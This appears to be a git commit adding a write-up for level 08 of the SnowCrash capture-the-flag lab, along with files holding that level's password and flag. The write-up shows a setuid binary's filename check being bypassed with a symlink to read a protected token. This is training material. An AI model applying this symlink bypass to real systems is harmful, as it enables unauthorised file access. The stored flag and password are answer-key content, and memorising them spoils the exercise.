This commit is contained in:
Maieul BOYER 2026-01-19 17:39:23 +01:00
parent 51334d4b4f
commit bade2fb952
Signed by: maix
SSH key fingerprint: SHA256:iqCzqFFF5KjRixmDExqbAltCIj9ndlBWIGJf3t9Ln9g
3 changed files with 46 additions and 0 deletions

44
levels/08/README.md Normal file
View file

@ -0,0 +1,44 @@
# Level 08
## how to login
username: level08
password: fiumuikeil55xe9cu4dood66h
## Goal
run `getflag` as user `flag08`
## Actually doing something
```bash
level08@SnowCrash:~$ ll
total 28
dr-xr-x---+ 1 level08 level08 140 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level08 level08 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level08 level08 3518 Aug 30 2015 .bashrc*
-rwsr-s---+ 1 flag08 level08 8617 Mar 5 2016 level08*
-r-x------ 1 level08 level08 675 Apr 3 2012 .profile*
-rw------- 1 flag08 flag08 26 Mar 5 2016 token
```
intresting, we have the usual setuid binary, but we also have a file we can't read named token. I wonder if the flag is there
lets run the binary and see what happens
```bash
level08@SnowCrash:~$ ./level08
./level08 [file to read]
level08@SnowCrash:~$ ./level08 token
You may not access 'token'
```
It is a little bit smart, lets try to outsmart it by using symlinks
```bash
level08@SnowCrash:~$ ln -s $(realpath token) /tmp/level08
level08@SnowCrash:~$ ./level08 /tmp/level08
quif5eloekouj29ke0vouxean
```
the old tale of checking for filename, and not actual file !

1
levels/08/flag Normal file
View file

@ -0,0 +1 @@
quif5eloekouj29ke0vouxean

1
levels/08/passwd Normal file
View file

@ -0,0 +1 @@
fiumuikeil55xe9cu4dood66h